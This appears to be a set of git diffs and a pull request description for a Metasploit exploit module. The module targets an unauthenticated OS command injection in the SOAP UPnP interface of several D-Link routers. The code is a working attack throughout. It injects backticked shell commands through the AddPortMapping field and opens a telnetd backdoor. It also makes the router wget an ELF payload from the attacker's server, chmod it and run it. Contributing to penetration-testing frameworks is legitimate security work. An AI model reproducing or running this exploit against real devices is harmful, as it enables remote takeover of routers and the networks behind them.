+			vprint_status("#{rhost}:#{rport} - deleting portmapping")
+			sOAPAction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
+
+			data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
+			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{newExternalPort}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
+			data_cmd << "</m:DeletePortMapping>"
+		end
+
+		data_cmd << "</SOAP-ENV:Body>"
+		data_cmd << "</SOAP-ENV:Envelope>"
+
+		begin
+			res = send_request_raw({
+				'uri'    => uri << data_uri,
+				'method' => 'POST',
+				'headers' => {
+					'SOAPAction' => sOAPAction,
+					'Content-Type' => "text/xml"
+					},
+				'data' => data_cmd
+			})
+		return res
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return nil
+		end
+	end
+
+	def exploit
+		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+
+		newPortMappingDescription = rand_text_alpha(8)
+		newExternalPort = rand(65535)
+		newInternalPort = rand(65535)
+
+		if target.name =~ /CMD/
+			if not (datastore['CMD'])
+				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
+			end
+			cmd = payload.encoded
+			type = "add"
+			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			if (!res or res.code != 200)
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+			end
+			print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+			type = "delete"
+			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			if (!res or res.code != 200)
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+			end
+			return
+		end
+
+		if target.name =~ /Telnet/
+			passw = datastore['TELNETPASS'] || rand_text_alpha(8)
+			user = datastore['TELNETUSER'] || rand_text_alpha(4)
+			telnetport = rand(65535)
+
+			vprint_status("#{rhost}:#{rport} - User: #{user}")
+			vprint_status("#{rhost}:#{rport} - Password: #{passw}")
+			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
+
+			cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+			type = "add"
+			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			if (!res or res.code != 200)
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+			end
+			type = "delete"
+			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			if (!res or res.code != 200)
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+			end
+			begin
+				telnet_sock = nil
+				telnet_sock = TCPSocket.open(rhost,telnetport)
+				if telnet_sock
+					print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
+				else
+					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+				end
+				telnet_sock.close
+
+				#modules/auxiliary/scanner/telnet/telnet_login.rb
+				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
+				auth_info = {
+					:host   => rhost,
+					:port   => telnetport,
+					:sname => 'telnet',
+					:user   => user,
+					:pass	=> passw,
+					:source_type => "exploit",
+					:active => true
+				}
+				report_auth_info(auth_info)
+				# NOT WORKING
+				#merge_me = {
+				#	'USERPASS_FILE' => nil,
+				#	'USER_FILE'     => nil,
+				#	'PASS_FILE'     => nil,
+				#	'USERNAME'      => user,
+				#	'PASSWORD'      => passw
+				#}
+				#start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, true)
+			rescue
+				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+			end
+			return
+		end
+
+		#thx to Juan for his awesome work on the mipsel elf support
+		@pl = generate_payload_exe
+		@elf_sent = false
+
+		#
+		# start our server
+		#
+		resource_uri = '/' + downfile
+
+		if (datastore['DOWNHOST'])
+			service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+		else
+			#do not use SSL
+			if datastore['SSL']
+				ssl_restore = true
+				datastore['SSL'] = false
+			end
+
+			#we use SRVHOST as download IP for the coming wget command.
+			#SRVHOST needs a real IP address of our download host
+			if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+				srv_host = Rex::Socket.source_address(rhost)
+			else
+				srv_host = datastore['SRVHOST']
+			end
+
+			service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+
+			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+			start_service({'Uri' => {
+				'Proc' => Proc.new { |cli, req|
+					on_request_uri(cli, req)
+				},
+				'Path' => resource_uri
+			}})
+
+			datastore['SSL'] = true if ssl_restore
+		end
+
+		#
+		# download payload
+		#
+		print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}")
+		#this filename is used to store the payload on the device
+		filename = rand_text_alpha_lower(8)
+
+		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
+		type = "add"
+		res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+		if (!res or res.code != 200)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
+		end
+
+		# wait for payload download
+		if (datastore['DOWNHOST'])
+			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
+			select(nil, nil, nil, datastore['HTTP_DELAY'])
+		else
+			wait_linux_payload
+		end
+
+		register_file_for_cleanup("/tmp/#{filename}")
+
+		type = "delete"
+		res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+		if (!res or res.code != 200)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+	end
+
+	# Handle incoming requests from the server
+	def on_request_uri(cli, request)
+		#print_status("on_request_uri called: #{request.inspect}")
+		if (not @pl)
+			print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+			return
+		end
+		print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+		@elf_sent = true
+		send_response(cli, @pl)
+	end
+
+	# wait for the data to be sent
+	def wait_linux_payload
+		print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")
+
+		waited = 0
+		while (not @elf_sent)
+			select(nil, nil, nil, 1)
+			waited += 1
+			if (waited > datastore['HTTP_DELAY'])
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?")
+			end
+		end
+	end
+end

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Telnet',	#all devices, use a netcat bind payload for getting a valid session
+					[ 'Telnet',	#all devices
 						{
 						'Arch' => ARCH_CMD,
 						'Platform' => 'unix'
@@ -144,7 +144,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		handler
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
 		new_portmapping_description = rand_text_alpha(8)
@@ -221,21 +220,21 @@ class Metasploit3 < Msf::Exploit::Remote
 				}
 				#taken from ./lib/msf/core/auxiliary/commandshell.rb
 				info = "TELNET (#{rhost}:#{telnetport})"
-		                sess = Msf::Sessions::CommandShell.new(sock)
+				sess = Msf::Sessions::CommandShell.new(sock)
 				sess.set_from_exploit(self)
-                		sess.info = info
+				sess.info = info
 
-                		# Clean up the stored data
-		                sess.exploit_datastore.merge!(merge_me)
+				# Clean up the stored data
+				sess.exploit_datastore.merge!(merge_me)
 
-                		# Prevent the socket from being closed
-		                self.sockets.delete(sock)
-                		self.sock = nil if self.respond_to? :sock
+				# Prevent the socket from being closed
+				self.sockets.delete(sock)
+				self.sock = nil if self.respond_to? :sock
 
-		                framework.sessions.register(sess)
-                		sess.process_autoruns(datastore)
+				framework.sessions.register(sess)
+				sess.process_autoruns(datastore)
 
-		                sess
+				sess
 			rescue
 				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -14,6 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpServer
 	include Msf::Exploit::EXE
 	include Msf::Exploit::FileDropper
+	include Msf::Auxiliary::CommandShell
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -27,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				a blind OS command injection vulnerability, there is no output for the executed
 				command when using the cmd generic payload. A ping command against a controlled
 				system could be used for testing purposes. This module has been tested successfully
-				on DIR-300, DIR-600, DIR-645, DIR-845, DIR-865 and DAP1522.
+				on DIR-300, DIR-600, DIR-645, DIR-845, DIR-865.
+				It looks like that there are some more D-Link devices affected.
 			},
 			'Author'      =>
 				[
@@ -84,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	def request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 
 		uri = '/soap.cgi'
 		data_uri = "?service=WANIPConn1"
@@ -96,25 +98,25 @@ class Metasploit3 < Msf::Exploit::Remote
 		if type == "add"
 			vprint_status("#{rhost}:#{rport} - adding portmapping")
 
-			sOAPAction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
+			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
 
 			data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewPortMappingDescription>#{newPortMappingDescription}</NewPortMappingDescription>"
+			data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
 			data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
 			data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
 			data_cmd << "<NewEnabled>1</NewEnabled>"
-			data_cmd << "<NewExternalPort>#{newExternalPort}</NewExternalPort>"
+			data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
 			data_cmd << "<NewRemoteHost></NewRemoteHost>"
 			data_cmd << "<NewProtocol>TCP</NewProtocol>"
-			data_cmd << "<NewInternalPort>#{newInternalPort}</NewInternalPort>"
+			data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
 			data_cmd << "</m:AddPortMapping>"
 		else
 			#we should clean it up ... otherwise we are not able to exploit it multiple times
 			vprint_status("#{rhost}:#{rport} - deleting portmapping")
-			sOAPAction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
+			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
 
 			data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{newExternalPort}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
+			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
 			data_cmd << "</m:DeletePortMapping>"
 		end
 
@@ -124,9 +126,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			res = send_request_raw({
 				'uri'    => uri << data_uri,
+				#'vars_get' => {
+				#	'service' => 'WANIPConn1'
+				#},
 				'method' => 'POST',
 				'headers' => {
-					'SOAPAction' => sOAPAction,
+					'SOAPAction' => soapaction,
 					'Content-Type' => "text/xml"
 					},
 				'data' => data_cmd
@@ -141,9 +146,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
-		newPortMappingDescription = rand_text_alpha(8)
-		newExternalPort = rand(65535)
-		newInternalPort = rand(65535)
+		new_portmapping_description = rand_text_alpha(8)
+		new_external_port = rand(65535)
+		new_internal_port = rand(65535)
 
 		if target.name =~ /CMD/
 			if not (datastore['CMD'])
@@ -151,13 +156,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 			cmd = payload.encoded
 			type = "add"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
 			print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 			type = "delete"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
@@ -175,26 +180,25 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
 			type = "add"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
 			type = "delete"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
+
 			begin
-				telnet_sock = nil
-				telnet_sock = TCPSocket.open(rhost,telnetport)
-				if telnet_sock
+				sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+				if sock
 					print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
 				else
 					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
-				telnet_sock.close
 
-				#modules/auxiliary/scanner/telnet/telnet_login.rb
 				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
 				auth_info = {
 					:host   => rhost,
@@ -206,15 +210,17 @@ class Metasploit3 < Msf::Exploit::Remote
 					:active => true
 				}
 				report_auth_info(auth_info)
+				merge_me = {
+					'USERPASS_FILE' => nil,
+					'USER_FILE'     => nil,
+					'PASS_FILE'     => nil,
+					'USERNAME'      => user,
+					'PASSWORD'      => passw
+				}
 				# NOT WORKING
-				#merge_me = {
-				#	'USERPASS_FILE' => nil,
-				#	'USER_FILE'     => nil,
-				#	'PASS_FILE'     => nil,
-				#	'USERNAME'      => user,
-				#	'PASSWORD'      => passw
-				#}
-				#start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, true)
+				conn = Net::SSH::CommandStream.new(sock, '/bin/sh', true)
+				#puts conn.methods.to_s
+				start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, false, conn.lsock)
 			rescue
 				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end
@@ -269,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
 		type = "add"
-		res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 		if (!res or res.code != 200)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
@@ -285,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_file_for_cleanup("/tmp/#{filename}")
 
 		type = "delete"
-		res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 		if (!res or res.code != 200)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -58,13 +58,13 @@ class Metasploit3 < Msf::Exploit::Remote
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Telnet',	#all devices
+					[ 'Telnet',	#all devices, use a netcat bind payload for getting a valid session
 						{
 						'Arch' => ARCH_CMD,
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Linux mipsel Payload',	#DIR-865, DIR-645
+					[ 'Linux mipsel Payload',	#DIR-865, DIR-645, and some more
 						{
 						'Arch' => ARCH_MIPSLE,
 						'Platform' => 'linux'
@@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
-				OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
-				OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
+				#OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
+				#OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
 			], self.class)
 	end
 
@@ -144,6 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
+		handler
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
 		new_portmapping_description = rand_text_alpha(8)
@@ -170,15 +171,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		if target.name =~ /Telnet/
-			passw = datastore['TELNETPASS'] || rand_text_alpha(8)
-			user = datastore['TELNETUSER'] || rand_text_alpha(4)
+			#passw = datastore['TELNETPASS'] || rand_text_alpha(8)
+			#user = datastore['TELNETUSER'] || rand_text_alpha(4)
 			telnetport = rand(65535)
 
-			vprint_status("#{rhost}:#{rport} - User: #{user}")
-			vprint_status("#{rhost}:#{rport} - Password: #{passw}")
+			#vprint_status("#{rhost}:#{rport} - User: #{user}")
+			#vprint_status("#{rhost}:#{rport} - Password: #{passw}")
 			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
-			cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+			#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+			cmd = "telnetd -p #{telnetport}"	# -l \"/usr/sbin/login\" -u #{user}:#{passw}"
 			type = "add"
 			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
@@ -199,13 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote
 					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
 
-				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
+				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
 				auth_info = {
 					:host   => rhost,
 					:port   => telnetport,
 					:sname => 'telnet',
-					:user   => user,
-					:pass	=> passw,
+					#:user   => user,
+					#:pass	=> passw,
 					:source_type => "exploit",
 					:active => true
 				}
@@ -214,13 +216,26 @@ class Metasploit3 < Msf::Exploit::Remote
 					'USERPASS_FILE' => nil,
 					'USER_FILE'     => nil,
 					'PASS_FILE'     => nil,
-					'USERNAME'      => user,
-					'PASSWORD'      => passw
+					#'USERNAME'      => user,
+					#'PASSWORD'      => passw
 				}
-				# NOT WORKING
-				conn = Net::SSH::CommandStream.new(sock, '/bin/sh', true)
-				#puts conn.methods.to_s
-				start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, false, conn.lsock)
+				#taken from ./lib/msf/core/auxiliary/commandshell.rb
+				info = "TELNET (#{rhost}:#{telnetport})"
+		                sess = Msf::Sessions::CommandShell.new(sock)
+				sess.set_from_exploit(self)
+                		sess.info = info
+
+                		# Clean up the stored data
+		                sess.exploit_datastore.merge!(merge_me)
+
+                		# Prevent the socket from being closed
+		                self.sockets.delete(sock)
+                		self.sock = nil if self.respond_to? :sock
+
+		                framework.sessions.register(sess)
+                		sess.process_autoruns(datastore)
+
+		                sess
 			rescue
 				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end


### PR DESCRIPTION
Hey guys,

 attached you could find a module for exploiting a OS command injection vulnerability in the SOAP UPnP interface of different D-Link routers.

At least the following devices are vulnerable:
DIR-300 rev B - 2.14b01
DIR-600 - 2.16b01
DIR-645 - 1.04b01
DIR-845 - 1.01b02
DIR-865 - 1.05b03

You could find the advisory here: http://www.s3cur1ty.de/M1ADV2013-020

Best,
MIke
